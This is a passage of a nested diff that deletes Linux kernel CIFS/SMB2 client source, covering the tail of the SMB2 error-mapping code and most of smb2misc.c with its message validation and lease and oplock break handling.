+-	{STATUS_IPSEC_CLEAR_TEXT_DROP, -EIO, "STATUS_IPSEC_CLEAR_TEXT_DROP"},
+-	{0, 0, NULL}
+-};
+-
+-/*****************************************************************************
+- Print an error message from the status code
+- *****************************************************************************/
+-static void
+-smb2_print_status(__le32 status)
+-{
+-	int idx = 0;
+-
+-	while (smb2_error_map_table[idx].status_string != NULL) {
+-		if ((smb2_error_map_table[idx].smb2_status) == status) {
+-			pr_notice("Status code returned 0x%08x %s\n", status,
+-				  smb2_error_map_table[idx].status_string);
+-		}
+-		idx++;
+-	}
+-	return;
+-}
+-
+-int
+-map_smb2_to_linux_error(char *buf, bool log_err)
+-{
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
+-	unsigned int i;
+-	int rc = -EIO;
+-	__le32 smb2err = shdr->Status;
+-
+-	if (smb2err == 0) {
+-		trace_smb3_cmd_done(le32_to_cpu(shdr->Id.SyncId.TreeId),
+-			      le64_to_cpu(shdr->SessionId),
+-			      le16_to_cpu(shdr->Command),
+-			      le64_to_cpu(shdr->MessageId));
+-		return 0;
+-	}
+-
+-	/* mask facility */
+-	if (log_err && (smb2err != STATUS_MORE_PROCESSING_REQUIRED) &&
+-	    (smb2err != STATUS_END_OF_FILE))
+-		smb2_print_status(smb2err);
+-	else if (cifsFYI & CIFS_RC)
+-		smb2_print_status(smb2err);
+-
+-	for (i = 0; i < sizeof(smb2_error_map_table) /
+-			sizeof(struct status_to_posix_error); i++) {
+-		if (smb2_error_map_table[i].smb2_status == smb2err) {
+-			rc = smb2_error_map_table[i].posix_error;
+-			break;
+-		}
+-	}
+-
+-	/* on error mapping not found  - return EIO */
+-
+-	cifs_dbg(FYI, "Mapping SMB2 status code 0x%08x to POSIX err %d\n",
+-		 __le32_to_cpu(smb2err), rc);
+-
+-	trace_smb3_cmd_err(le32_to_cpu(shdr->Id.SyncId.TreeId),
+-			   le64_to_cpu(shdr->SessionId),
+-			   le16_to_cpu(shdr->Command),
+-			   le64_to_cpu(shdr->MessageId),
+-			   le32_to_cpu(smb2err), rc);
+-	return rc;
+-}
+diff --git a/fs/cifs/smb2misc.c b/fs/cifs/smb2misc.c
+deleted file mode 100644
+index 572293c18e16f..0000000000000
+--- a/fs/cifs/smb2misc.c
++++ /dev/null
+@@ -1,944 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1
+-/*
+- *
+- *   Copyright (C) International Business Machines  Corp., 2002,2011
+- *                 Etersoft, 2012
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *              Pavel Shilovsky (pshilovsky@samba.org) 2012
+- *
+- */
+-#include <linux/ctype.h>
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "smb2proto.h"
+-#include "cifs_debug.h"
+-#include "cifs_unicode.h"
+-#include "smb2status.h"
+-#include "smb2glob.h"
+-#include "nterr.h"
+-#include "cached_dir.h"
+-
+-static int
+-check_smb2_hdr(struct smb2_hdr *shdr, __u64 mid)
+-{
+-	__u64 wire_mid = le64_to_cpu(shdr->MessageId);
+-
+-	/*
+-	 * Make sure that this really is an SMB, that it is a response,
+-	 * and that the message ids match.
+-	 */
+-	if ((shdr->ProtocolId == SMB2_PROTO_NUMBER) &&
+-	    (mid == wire_mid)) {
+-		if (shdr->Flags & SMB2_FLAGS_SERVER_TO_REDIR)
+-			return 0;
+-		else {
+-			/* only one valid case where server sends us request */
+-			if (shdr->Command == SMB2_OPLOCK_BREAK)
+-				return 0;
+-			else
+-				cifs_dbg(VFS, "Received Request not response\n");
+-		}
+-	} else { /* bad signature or mid */
+-		if (shdr->ProtocolId != SMB2_PROTO_NUMBER)
+-			cifs_dbg(VFS, "Bad protocol string signature header %x\n",
+-				 le32_to_cpu(shdr->ProtocolId));
+-		if (mid != wire_mid)
+-			cifs_dbg(VFS, "Mids do not match: %llu and %llu\n",
+-				 mid, wire_mid);
+-	}
+-	cifs_dbg(VFS, "Bad SMB detected. The Mid=%llu\n", wire_mid);
+-	return 1;
+-}
+-
+-/*
+- *  The following table defines the expected "StructureSize" of SMB2 responses
+- *  in order by SMB2 command.  This is similar to "wct" in SMB/CIFS responses.
+- *
+- *  Note that commands are defined in smb2pdu.h in le16 but the array below is
+- *  indexed by command in host byte order
+- */
+-static const __le16 smb2_rsp_struct_sizes[NUMBER_OF_SMB2_COMMANDS] = {
+-	/* SMB2_NEGOTIATE */ cpu_to_le16(65),
+-	/* SMB2_SESSION_SETUP */ cpu_to_le16(9),
+-	/* SMB2_LOGOFF */ cpu_to_le16(4),
+-	/* SMB2_TREE_CONNECT */ cpu_to_le16(16),
+-	/* SMB2_TREE_DISCONNECT */ cpu_to_le16(4),
+-	/* SMB2_CREATE */ cpu_to_le16(89),
+-	/* SMB2_CLOSE */ cpu_to_le16(60),
+-	/* SMB2_FLUSH */ cpu_to_le16(4),
+-	/* SMB2_READ */ cpu_to_le16(17),
+-	/* SMB2_WRITE */ cpu_to_le16(17),
+-	/* SMB2_LOCK */ cpu_to_le16(4),
+-	/* SMB2_IOCTL */ cpu_to_le16(49),
+-	/* BB CHECK this ... not listed in documentation */
+-	/* SMB2_CANCEL */ cpu_to_le16(0),
+-	/* SMB2_ECHO */ cpu_to_le16(4),
+-	/* SMB2_QUERY_DIRECTORY */ cpu_to_le16(9),
+-	/* SMB2_CHANGE_NOTIFY */ cpu_to_le16(9),
+-	/* SMB2_QUERY_INFO */ cpu_to_le16(9),
+-	/* SMB2_SET_INFO */ cpu_to_le16(2),
+-	/* BB FIXME can also be 44 for lease break */
+-	/* SMB2_OPLOCK_BREAK */ cpu_to_le16(24)
+-};
+-
+-#define SMB311_NEGPROT_BASE_SIZE (sizeof(struct smb2_hdr) + sizeof(struct smb2_negotiate_rsp))
+-
+-static __u32 get_neg_ctxt_len(struct smb2_hdr *hdr, __u32 len,
+-			      __u32 non_ctxlen)
+-{
+-	__u16 neg_count;
+-	__u32 nc_offset, size_of_pad_before_neg_ctxts;
+-	struct smb2_negotiate_rsp *pneg_rsp = (struct smb2_negotiate_rsp *)hdr;
+-
+-	/* Negotiate contexts are only valid for latest dialect SMB3.11 */
+-	neg_count = le16_to_cpu(pneg_rsp->NegotiateContextCount);
+-	if ((neg_count == 0) ||
+-	   (pneg_rsp->DialectRevision != cpu_to_le16(SMB311_PROT_ID)))
+-		return 0;
+-
+-	/*
+-	 * if SPNEGO blob present (ie the RFC2478 GSS info which indicates
+-	 * which security mechanisms the server supports) make sure that
+-	 * the negotiate contexts start after it
+-	 */
+-	nc_offset = le32_to_cpu(pneg_rsp->NegotiateContextOffset);
+-	/*
+-	 * non_ctxlen is at least shdr->StructureSize + pdu->StructureSize2
+-	 * and the latter is 1 byte bigger than the fixed-size area of the
+-	 * NEGOTIATE response
+-	 */
+-	if (nc_offset + 1 < non_ctxlen) {
+-		pr_warn_once("Invalid negotiate context offset %d\n", nc_offset);
+-		return 0;
+-	} else if (nc_offset + 1 == non_ctxlen) {
+-		cifs_dbg(FYI, "no SPNEGO security blob in negprot rsp\n");
+-		size_of_pad_before_neg_ctxts = 0;
+-	} else if (non_ctxlen == SMB311_NEGPROT_BASE_SIZE)
+-		/* has padding, but no SPNEGO blob */
+-		size_of_pad_before_neg_ctxts = nc_offset - non_ctxlen + 1;
+-	else
+-		size_of_pad_before_neg_ctxts = nc_offset - non_ctxlen;
+-
+-	/* Verify that at least minimal negotiate contexts fit within frame */
+-	if (len < nc_offset + (neg_count * sizeof(struct smb2_neg_context))) {
+-		pr_warn_once("negotiate context goes beyond end\n");
+-		return 0;
+-	}
+-
+-	cifs_dbg(FYI, "length of negcontexts %d pad %d\n",
+-		len - nc_offset, size_of_pad_before_neg_ctxts);
+-
+-	/* length of negcontexts including pad from end of sec blob to them */
+-	return (len - nc_offset) + size_of_pad_before_neg_ctxts;
+-}
+-
+-int
+-smb2_check_message(char *buf, unsigned int len, struct TCP_Server_Info *server)
+-{
+-	struct TCP_Server_Info *pserver;
+-	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
+-	struct smb2_pdu *pdu = (struct smb2_pdu *)shdr;
+-	int hdr_size = sizeof(struct smb2_hdr);
+-	int pdu_size = sizeof(struct smb2_pdu);
+-	int command;
+-	__u32 calc_len; /* calculated length */
+-	__u64 mid;
+-
+-	/* If server is a channel, select the primary channel */
+-	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+-
+-	/*
+-	 * Add function to do table lookup of StructureSize by command
+-	 * ie Validate the wct via smb2_struct_sizes table above
+-	 */
+-	if (shdr->ProtocolId == SMB2_TRANSFORM_PROTO_NUM) {
+-		struct smb2_transform_hdr *thdr =
+-			(struct smb2_transform_hdr *)buf;
+-		struct cifs_ses *ses = NULL;
+-		struct cifs_ses *iter;
+-
+-		/* decrypt frame now that it is completely read in */
+-		spin_lock(&cifs_tcp_ses_lock);
+-		list_for_each_entry(iter, &pserver->smb_ses_list, smb_ses_list) {
+-			if (iter->Suid == le64_to_cpu(thdr->SessionId)) {
+-				ses = iter;
+-				break;
+-			}
+-		}
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		if (!ses) {
+-			cifs_dbg(VFS, "no decryption - session id not found\n");
+-			return 1;
+-		}
+-	}
+-
+-	mid = le64_to_cpu(shdr->MessageId);
+-	if (len < pdu_size) {
+-		if ((len >= hdr_size)
+-		    && (shdr->Status != 0)) {
+-			pdu->StructureSize2 = 0;
+-			/*
+-			 * As with SMB/CIFS, on some error cases servers may
+-			 * not return wct properly
+-			 */
+-			return 0;
+-		} else {
+-			cifs_dbg(VFS, "Length less than SMB header size\n");
+-		}
+-		return 1;
+-	}
+-	if (len > CIFSMaxBufSize + MAX_SMB2_HDR_SIZE) {
+-		cifs_dbg(VFS, "SMB length greater than maximum, mid=%llu\n",
+-			 mid);
+-		return 1;
+-	}
+-
+-	if (check_smb2_hdr(shdr, mid))
+-		return 1;
+-
+-	if (shdr->StructureSize != SMB2_HEADER_STRUCTURE_SIZE) {
+-		cifs_dbg(VFS, "Invalid structure size %u\n",
+-			 le16_to_cpu(shdr->StructureSize));
+-		return 1;
+-	}
+-
+-	command = le16_to_cpu(shdr->Command);
+-	if (command >= NUMBER_OF_SMB2_COMMANDS) {
+-		cifs_dbg(VFS, "Invalid SMB2 command %d\n", command);
+-		return 1;
+-	}
+-
+-	if (smb2_rsp_struct_sizes[command] != pdu->StructureSize2) {
+-		if (command != SMB2_OPLOCK_BREAK_HE && (shdr->Status == 0 ||
+-		    pdu->StructureSize2 != SMB2_ERROR_STRUCTURE_SIZE2_LE)) {
+-			/* error packets have 9 byte structure size */
+-			cifs_dbg(VFS, "Invalid response size %u for command %d\n",
+-				 le16_to_cpu(pdu->StructureSize2), command);
+-			return 1;
+-		} else if (command == SMB2_OPLOCK_BREAK_HE
+-			   && (shdr->Status == 0)
+-			   && (le16_to_cpu(pdu->StructureSize2) != 44)
+-			   && (le16_to_cpu(pdu->StructureSize2) != 36)) {
+-			/* special case for SMB2.1 lease break message */
+-			cifs_dbg(VFS, "Invalid response size %d for oplock break\n",
+-				 le16_to_cpu(pdu->StructureSize2));
+-			return 1;
+-		}
+-	}
+-
+-	calc_len = smb2_calc_size(buf);
+-
+-	/* For SMB2_IOCTL, OutputOffset and OutputLength are optional, so might
+-	 * be 0, and not a real miscalculation */
+-	if (command == SMB2_IOCTL_HE && calc_len == 0)
+-		return 0;
+-
+-	if (command == SMB2_NEGOTIATE_HE)
+-		calc_len += get_neg_ctxt_len(shdr, len, calc_len);
+-
+-	if (len != calc_len) {
+-		/* create failed on symlink */
+-		if (command == SMB2_CREATE_HE &&
+-		    shdr->Status == STATUS_STOPPED_ON_SYMLINK)
+-			return 0;
+-		/* Windows 7 server returns 24 bytes more */
+-		if (calc_len + 24 == len && command == SMB2_OPLOCK_BREAK_HE)
+-			return 0;
+-		/* server can return one byte more due to implied bcc[0] */
+-		if (calc_len == len + 1)
+-			return 0;
+-
+-		/*
+-		 * Some windows servers (win2016) will also pad the final
+-		 * PDU in a compound to 8 bytes.
+-		 */
+-		if (ALIGN(calc_len, 8) == len)
+-			return 0;
+-
+-		/*
+-		 * MacOS server pads after SMB2.1 write response with 3 bytes
+-		 * of junk. Other servers match RFC1001 len to actual
+-		 * SMB2/SMB3 frame length (header + smb2 response specific data)
+-		 * Some windows servers also pad up to 8 bytes when compounding.
+-		 */
+-		if (calc_len < len)
+-			return 0;
+-
+-		/* Only log a message if len was really miscalculated */
+-		if (unlikely(cifsFYI))
+-			cifs_dbg(FYI, "Server response too short: calculated "
+-				 "length %u doesn't match read length %u (cmd=%d, mid=%llu)\n",
+-				 calc_len, len, command, mid);
+-		else
+-			pr_warn("Server response too short: calculated length "
+-				"%u doesn't match read length %u (cmd=%d, mid=%llu)\n",
+-				calc_len, len, command, mid);
+-
+-		return 1;
+-	}
+-	return 0;
+-}
+-
+-/*
+- * The size of the variable area depends on the offset and length fields
+- * located in different fields for various SMB2 responses. SMB2 responses
+- * with no variable length info, show an offset of zero for the offset field.
+- */
+-static const bool has_smb2_data_area[NUMBER_OF_SMB2_COMMANDS] = {
+-	/* SMB2_NEGOTIATE */ true,
+-	/* SMB2_SESSION_SETUP */ true,
+-	/* SMB2_LOGOFF */ false,
+-	/* SMB2_TREE_CONNECT */	false,
+-	/* SMB2_TREE_DISCONNECT */ false,
+-	/* SMB2_CREATE */ true,
+-	/* SMB2_CLOSE */ false,
+-	/* SMB2_FLUSH */ false,
+-	/* SMB2_READ */	true,
+-	/* SMB2_WRITE */ false,
+-	/* SMB2_LOCK */	false,
+-	/* SMB2_IOCTL */ true,
+-	/* SMB2_CANCEL */ false, /* BB CHECK this not listed in documentation */
+-	/* SMB2_ECHO */ false,
+-	/* SMB2_QUERY_DIRECTORY */ true,
+-	/* SMB2_CHANGE_NOTIFY */ true,
+-	/* SMB2_QUERY_INFO */ true,
+-	/* SMB2_SET_INFO */ false,
+-	/* SMB2_OPLOCK_BREAK */ false
+-};
+-
+-/*
+- * Returns the pointer to the beginning of the data area. Length of the data
+- * area and the offset to it (from the beginning of the smb) are also returned.
+- */
+-char *
+-smb2_get_data_area_len(int *off, int *len, struct smb2_hdr *shdr)
+-{
+-	*off = 0;
+-	*len = 0;
+-
+-	/* error responses do not have data area */
+-	if (shdr->Status && shdr->Status != STATUS_MORE_PROCESSING_REQUIRED &&
+-	    (((struct smb2_err_rsp *)shdr)->StructureSize) ==
+-						SMB2_ERROR_STRUCTURE_SIZE2_LE)
+-		return NULL;
+-
+-	/*
+-	 * Following commands have data areas so we have to get the location
+-	 * of the data buffer offset and data buffer length for the particular
+-	 * command.
+-	 */
+-	switch (shdr->Command) {
+-	case SMB2_NEGOTIATE:
+-		*off = le16_to_cpu(
+-		  ((struct smb2_negotiate_rsp *)shdr)->SecurityBufferOffset);
+-		*len = le16_to_cpu(
+-		  ((struct smb2_negotiate_rsp *)shdr)->SecurityBufferLength);
+-		break;
+-	case SMB2_SESSION_SETUP:
+-		*off = le16_to_cpu(
+-		  ((struct smb2_sess_setup_rsp *)shdr)->SecurityBufferOffset);
+-		*len = le16_to_cpu(
+-		  ((struct smb2_sess_setup_rsp *)shdr)->SecurityBufferLength);
+-		break;
+-	case SMB2_CREATE:
+-		*off = le32_to_cpu(
+-		    ((struct smb2_create_rsp *)shdr)->CreateContextsOffset);
+-		*len = le32_to_cpu(
+-		    ((struct smb2_create_rsp *)shdr)->CreateContextsLength);
+-		break;
+-	case SMB2_QUERY_INFO:
+-		*off = le16_to_cpu(
+-		    ((struct smb2_query_info_rsp *)shdr)->OutputBufferOffset);
+-		*len = le32_to_cpu(
+-		    ((struct smb2_query_info_rsp *)shdr)->OutputBufferLength);
+-		break;
+-	case SMB2_READ:
+-		/* TODO: is this a bug ? */
+-		*off = ((struct smb2_read_rsp *)shdr)->DataOffset;
+-		*len = le32_to_cpu(((struct smb2_read_rsp *)shdr)->DataLength);
+-		break;
+-	case SMB2_QUERY_DIRECTORY:
+-		*off = le16_to_cpu(
+-		  ((struct smb2_query_directory_rsp *)shdr)->OutputBufferOffset);
+-		*len = le32_to_cpu(
+-		  ((struct smb2_query_directory_rsp *)shdr)->OutputBufferLength);
+-		break;
+-	case SMB2_IOCTL:
+-		*off = le32_to_cpu(
+-		  ((struct smb2_ioctl_rsp *)shdr)->OutputOffset);
+-		*len = le32_to_cpu(
+-		  ((struct smb2_ioctl_rsp *)shdr)->OutputCount);
+-		break;
+-	case SMB2_CHANGE_NOTIFY:
+-		*off = le16_to_cpu(
+-		  ((struct smb2_change_notify_rsp *)shdr)->OutputBufferOffset);
+-		*len = le32_to_cpu(
+-		  ((struct smb2_change_notify_rsp *)shdr)->OutputBufferLength);
+-		break;
+-	default:
+-		cifs_dbg(VFS, "no length check for command %d\n", le16_to_cpu(shdr->Command));
+-		break;
+-	}
+-
+-	/*
+-	 * Invalid length or offset probably means data area is invalid, but
+-	 * we have little choice but to ignore the data area in this case.
+-	 */
+-	if (*off > 4096) {
+-		cifs_dbg(VFS, "offset %d too large, data area ignored\n", *off);
+-		*len = 0;
+-		*off = 0;
+-	} else if (*off < 0) {
+-		cifs_dbg(VFS, "negative offset %d to data invalid ignore data area\n",
+-			 *off);
+-		*off = 0;
+-		*len = 0;
+-	} else if (*len < 0) {
+-		cifs_dbg(VFS, "negative data length %d invalid, data area ignored\n",
+-			 *len);
+-		*len = 0;
+-	} else if (*len > 128 * 1024) {
+-		cifs_dbg(VFS, "data area larger than 128K: %d\n", *len);
+-		*len = 0;
+-	}
+-
+-	/* return pointer to beginning of data area, ie offset from SMB start */
+-	if ((*off != 0) && (*len != 0))
+-		return (char *)shdr + *off;
+-	else
+-		return NULL;
+-}
+-
+-/*
+- * Calculate the size of the SMB message based on the fixed header
+- * portion, the number of word parameters and the data portion of the message.
+- */
+-unsigned int
+-smb2_calc_size(void *buf)
+-{
+-	struct smb2_pdu *pdu = buf;
+-	struct smb2_hdr *shdr = &pdu->hdr;
+-	int offset; /* the offset from the beginning of SMB to data area */
+-	int data_length; /* the length of the variable length data area */
+-	/* Structure Size has already been checked to make sure it is 64 */
+-	int len = le16_to_cpu(shdr->StructureSize);
+-
+-	/*
+-	 * StructureSize2, ie length of fixed parameter area has already
+-	 * been checked to make sure it is the correct length.
+-	 */
+-	len += le16_to_cpu(pdu->StructureSize2);
+-
+-	if (has_smb2_data_area[le16_to_cpu(shdr->Command)] == false)
+-		goto calc_size_exit;
+-
+-	smb2_get_data_area_len(&offset, &data_length, shdr);
+-	cifs_dbg(FYI, "SMB2 data length %d offset %d\n", data_length, offset);
+-
+-	if (data_length > 0) {
+-		/*
+-		 * Check to make sure that data area begins after fixed area.
+-		 * Note that last byte of the fixed area is part of data area
+-		 * for some commands, typically those with odd StructureSize,
+-		 * so we must add one to the calculation.
+-		 */
+-		if (offset + 1 < len) {
+-			cifs_dbg(VFS, "data area offset %d overlaps SMB2 header %d\n",
+-				 offset + 1, len);
+-			data_length = 0;
+-		} else {
+-			len = offset + data_length;
+-		}
+-	}
+-calc_size_exit:
+-	cifs_dbg(FYI, "SMB2 len %d\n", len);
+-	return len;
+-}
+-
+-/* Note: caller must free return buffer */
+-__le16 *
+-cifs_convert_path_to_utf16(const char *from, struct cifs_sb_info *cifs_sb)
+-{
+-	int len;
+-	const char *start_of_path;
+-	__le16 *to;
+-	int map_type;
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SFM_CHR)
+-		map_type = SFM_MAP_UNI_RSVD;
+-	else if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MAP_SPECIAL_CHR)
+-		map_type = SFU_MAP_UNI_RSVD;
+-	else
+-		map_type = NO_MAP_UNI_RSVD;
+-
+-	/* Windows doesn't allow paths beginning with \ */
+-	if (from[0] == '\\')
+-		start_of_path = from + 1;
+-
+-	/* SMB311 POSIX extensions paths do not include leading slash */
+-	else if (cifs_sb_master_tlink(cifs_sb) &&
+-		 cifs_sb_master_tcon(cifs_sb)->posix_extensions &&
+-		 (from[0] == '/')) {
+-		start_of_path = from + 1;
+-	} else
+-		start_of_path = from;
+-
+-	to = cifs_strndup_to_utf16(start_of_path, PATH_MAX, &len,
+-				   cifs_sb->local_nls, map_type);
+-	return to;
+-}
+-
+-__le32
+-smb2_get_lease_state(struct cifsInodeInfo *cinode)
+-{
+-	__le32 lease = 0;
+-
+-	if (CIFS_CACHE_WRITE(cinode))
+-		lease |= SMB2_LEASE_WRITE_CACHING_LE;
+-	if (CIFS_CACHE_HANDLE(cinode))
+-		lease |= SMB2_LEASE_HANDLE_CACHING_LE;
+-	if (CIFS_CACHE_READ(cinode))
+-		lease |= SMB2_LEASE_READ_CACHING_LE;
+-	return lease;
+-}
+-
+-struct smb2_lease_break_work {
+-	struct work_struct lease_break;
+-	struct tcon_link *tlink;
+-	__u8 lease_key[16];
+-	__le32 lease_state;
+-};
+-
+-static void
+-cifs_ses_oplock_break(struct work_struct *work)
+-{
+-	struct smb2_lease_break_work *lw = container_of(work,
+-				struct smb2_lease_break_work, lease_break);
+-	int rc = 0;
+-
+-	rc = SMB2_lease_break(0, tlink_tcon(lw->tlink), lw->lease_key,
+-			      lw->lease_state);
+-
+-	cifs_dbg(FYI, "Lease release rc %d\n", rc);
+-	cifs_put_tlink(lw->tlink);
+-	kfree(lw);
+-}
+-
+-static void
+-smb2_queue_pending_open_break(struct tcon_link *tlink, __u8 *lease_key,
+-			      __le32 new_lease_state)
+-{
+-	struct smb2_lease_break_work *lw;
+-
+-	lw = kmalloc(sizeof(struct smb2_lease_break_work), GFP_KERNEL);
+-	if (!lw) {
+-		cifs_put_tlink(tlink);
+-		return;
+-	}
+-
+-	INIT_WORK(&lw->lease_break, cifs_ses_oplock_break);
+-	lw->tlink = tlink;
+-	lw->lease_state = new_lease_state;
+-	memcpy(lw->lease_key, lease_key, SMB2_LEASE_KEY_SIZE);
+-	queue_work(cifsiod_wq, &lw->lease_break);
+-}
+-
+-static bool
+-smb2_tcon_has_lease(struct cifs_tcon *tcon, struct smb2_lease_break *rsp)
+-{
+-	__u8 lease_state;
+-	struct cifsFileInfo *cfile;
+-	struct cifsInodeInfo *cinode;
+-	int ack_req = le32_to_cpu(rsp->Flags &
+-				  SMB2_NOTIFY_BREAK_LEASE_FLAG_ACK_REQUIRED);
+-
+-	lease_state = le32_to_cpu(rsp->NewLeaseState);
+-
+-	list_for_each_entry(cfile, &tcon->openFileList, tlist) {
+-		cinode = CIFS_I(d_inode(cfile->dentry));
+-
+-		if (memcmp(cinode->lease_key, rsp->LeaseKey,
+-							SMB2_LEASE_KEY_SIZE))
+-			continue;
+-
+-		cifs_dbg(FYI, "found in the open list\n");
+-		cifs_dbg(FYI, "lease key match, lease break 0x%x\n",
+-			 lease_state);
+-
+-		if (ack_req)
+-			cfile->oplock_break_cancelled = false;
+-		else
+-			cfile->oplock_break_cancelled = true;
+-
+-		set_bit(CIFS_INODE_PENDING_OPLOCK_BREAK, &cinode->flags);
+-
+-		cfile->oplock_epoch = le16_to_cpu(rsp->Epoch);
+-		cfile->oplock_level = lease_state;
+-
+-		cifs_queue_oplock_break(cfile);
+-		return true;
+-	}
+-
+-	return false;
+-}
+-
+-static struct cifs_pending_open *
+-smb2_tcon_find_pending_open_lease(struct cifs_tcon *tcon,
+-				  struct smb2_lease_break *rsp)
+-{
+-	__u8 lease_state = le32_to_cpu(rsp->NewLeaseState);
+-	int ack_req = le32_to_cpu(rsp->Flags &
+-				  SMB2_NOTIFY_BREAK_LEASE_FLAG_ACK_REQUIRED);
+-	struct cifs_pending_open *open;
+-	struct cifs_pending_open *found = NULL;
+-
+-	list_for_each_entry(open, &tcon->pending_opens, olist) {
+-		if (memcmp(open->lease_key, rsp->LeaseKey,
+-			   SMB2_LEASE_KEY_SIZE))
+-			continue;
+-
+-		if (!found && ack_req) {
+-			found = open;
+-		}
+-
+-		cifs_dbg(FYI, "found in the pending open list\n");
+-		cifs_dbg(FYI, "lease key match, lease break 0x%x\n",
+-			 lease_state);
+-
+-		open->oplock = lease_state;
+-	}
+-
+-	return found;
+-}
+-
+-static bool
+-smb2_is_valid_lease_break(char *buffer, struct TCP_Server_Info *server)
+-{
+-	struct smb2_lease_break *rsp = (struct smb2_lease_break *)buffer;
+-	struct TCP_Server_Info *pserver;
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon;
+-	struct cifs_pending_open *open;
+-
+-	cifs_dbg(FYI, "Checking for lease break\n");
+-
+-	/* If server is a channel, select the primary channel */
+-	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+-
+-	/* look up tcon based on tid & uid */
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
+-		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-			spin_lock(&tcon->open_file_lock);
+-			cifs_stats_inc(
+-				       &tcon->stats.cifs_stats.num_oplock_brks);
+-			if (smb2_tcon_has_lease(tcon, rsp)) {
+-				spin_unlock(&tcon->open_file_lock);
+-				spin_unlock(&cifs_tcp_ses_lock);
+-				return true;
+-			}
+-			open = smb2_tcon_find_pending_open_lease(tcon,
+-								 rsp);
+-			if (open) {
+-				__u8 lease_key[SMB2_LEASE_KEY_SIZE];
+-				struct tcon_link *tlink;
+-
+-				tlink = cifs_get_tlink(open->tlink);
+-				memcpy(lease_key, open->lease_key,
+-				       SMB2_LEASE_KEY_SIZE);
+-				spin_unlock(&tcon->open_file_lock);
+-				spin_unlock(&cifs_tcp_ses_lock);
+-				smb2_queue_pending_open_break(tlink,
+-							      lease_key,
+-							      rsp->NewLeaseState);
+-				return true;
+-			}
+-			spin_unlock(&tcon->open_file_lock);
+-
+-			if (cached_dir_lease_break(tcon, rsp->LeaseKey)) {
+-				spin_unlock(&cifs_tcp_ses_lock);
+-				return true;
+-			}
+-		}
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-	cifs_dbg(FYI, "Can not process lease break - no lease matched\n");
+-	trace_smb3_lease_not_found(le32_to_cpu(rsp->CurrentLeaseState),
+-				   le32_to_cpu(rsp->hdr.Id.SyncId.TreeId),
+-				   le64_to_cpu(rsp->hdr.SessionId),
+-				   *((u64 *)rsp->LeaseKey),
+-				   *((u64 *)&rsp->LeaseKey[8]));
+-
+-	return false;
+-}
+-
+-bool
+-smb2_is_valid_oplock_break(char *buffer, struct TCP_Server_Info *server)
+-{
+-	struct smb2_oplock_break *rsp = (struct smb2_oplock_break *)buffer;
+-	struct TCP_Server_Info *pserver;
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon;
+-	struct cifsInodeInfo *cinode;
+-	struct cifsFileInfo *cfile;
+-
+-	cifs_dbg(FYI, "Checking for oplock break\n");
+-
+-	if (rsp->hdr.Command != SMB2_OPLOCK_BREAK)
+-		return false;
+-
+-	if (rsp->StructureSize !=
+-				smb2_rsp_struct_sizes[SMB2_OPLOCK_BREAK_HE]) {
+-		if (le16_to_cpu(rsp->StructureSize) == 44)
+-			return smb2_is_valid_lease_break(buffer, server);
+-		else
+-			return false;
+-	}
+-
+-	cifs_dbg(FYI, "oplock level 0x%x\n", rsp->OplockLevel);
+-
+-	/* If server is a channel, select the primary channel */
+-	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
+-
+-	/* look up tcon based on tid & uid */
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(ses, &pserver->smb_ses_list, smb_ses_list) {
+-		list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-
+-			spin_lock(&tcon->open_file_lock);
+-			list_for_each_entry(cfile, &tcon->openFileList, tlist) {
+-				if (rsp->PersistentFid !=
+-				    cfile->fid.persistent_fid ||
+-				    rsp->VolatileFid !=
+-				    cfile->fid.volatile_fid)
+-					continue;
+-
+-				cifs_dbg(FYI, "file id match, oplock break\n");
+-				cifs_stats_inc(
+-				    &tcon->stats.cifs_stats.num_oplock_brks);
+-				cinode = CIFS_I(d_inode(cfile->dentry));
+-				spin_lock(&cfile->file_info_lock);
+-				if (!CIFS_CACHE_WRITE(cinode) &&
+-				    rsp->OplockLevel == SMB2_OPLOCK_LEVEL_NONE)
+-					cfile->oplock_break_cancelled = true;
+-				else
+-					cfile->oplock_break_cancelled = false;
+-
+-				set_bit(CIFS_INODE_PENDING_OPLOCK_BREAK,
+-					&cinode->flags);
+-
+-				cfile->oplock_epoch = 0;
+-				cfile->oplock_level = rsp->OplockLevel;
+-
+-				spin_unlock(&cfile->file_info_lock);
+-
+-				cifs_queue_oplock_break(cfile);
+-
+-				spin_unlock(&tcon->open_file_lock);
+-				spin_unlock(&cifs_tcp_ses_lock);
+-				return true;
+-			}
+-			spin_unlock(&tcon->open_file_lock);
+-		}
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-	cifs_dbg(FYI, "No file id matched, oplock break ignored\n");
+-	trace_smb3_oplock_not_found(0 /* no xid */, rsp->PersistentFid,
+-				  le32_to_cpu(rsp->hdr.Id.SyncId.TreeId),
+-				  le64_to_cpu(rsp->hdr.SessionId));
+-
+-	return true;
+-}
+-
+-void
+-smb2_cancelled_close_fid(struct work_struct *work)
+-{
+-	struct close_cancelled_open *cancelled = container_of(work,
+-					struct close_cancelled_open, work);
+-	struct cifs_tcon *tcon = cancelled->tcon;
+-	int rc;
+-
+-	if (cancelled->mid)
+-		cifs_tcon_dbg(VFS, "Close unmatched open for MID:%llu\n",
+-			      cancelled->mid);
+-	else
+-		cifs_tcon_dbg(VFS, "Close interrupted close\n");
+-
+-	rc = SMB2_close(0, tcon, cancelled->fid.persistent_fid,
+-			cancelled->fid.volatile_fid);
+-	if (rc)
+-		cifs_tcon_dbg(VFS, "Close cancelled mid failed rc:%d\n", rc);
+-
+-	cifs_put_tcon(tcon);
